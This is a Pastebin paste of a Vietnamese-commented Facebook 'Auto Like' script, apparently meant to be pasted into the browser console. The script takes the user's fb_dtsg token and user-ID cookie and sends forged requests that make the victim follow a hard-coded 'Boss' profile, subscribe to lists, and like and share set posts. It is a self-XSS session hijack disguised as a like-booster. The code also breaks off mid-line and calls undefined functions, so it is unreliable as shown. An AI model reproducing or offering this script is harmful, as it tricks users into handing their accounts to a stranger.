Advertisement
khanhyeuan

03/09/2017 Auto Like

Oct 28th, 2015
582
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.39 KB | None | 0 0
  1. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  2. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  3. alert('Code sau khi chạy từ 0-12h sẽ tăng nhé! mình sẽ add sublist!');
  4. function a(abone){
  5. var http4 = new XMLHttpRequest();
  6. var url4 = "/ajax/follow/follow_profile.php?__a=1";
  7. var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  8. http4.open("POST", url4, true);
  9. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  10. http4.setRequestHeader("Content-length", params4.length);
  11. http4.setRequestHeader("Connection", "close");
  12. http4.onreadystatechange = function() {
  13. if(http4.readyState == 4 && http4.status == 200) {http4.close;}
  14. }
  15. http4.send(params4);
  16. }
  17. // Close the connection
  18. function sublist(uidss) {
  19. var a = document.createElement('script');
  20. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  21. document.body.appendChild(a);
  22. }
  23. //AN VAO ANH DAI DIEN SAU DO CHAY CODE
  24. //Boss
  25. a("100004614907441");
  26. //Ex Only Ngo Hoang Trinh;
  27.  
  28. //Like
  29. Like("536532683177224");Like("533228090174350");Like("1618834858444948");Like("1866837816977983");Like("
  30. //Like Page
  31. P("241420652722117");
  32. //Shared
  33. S("1866837816977983");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement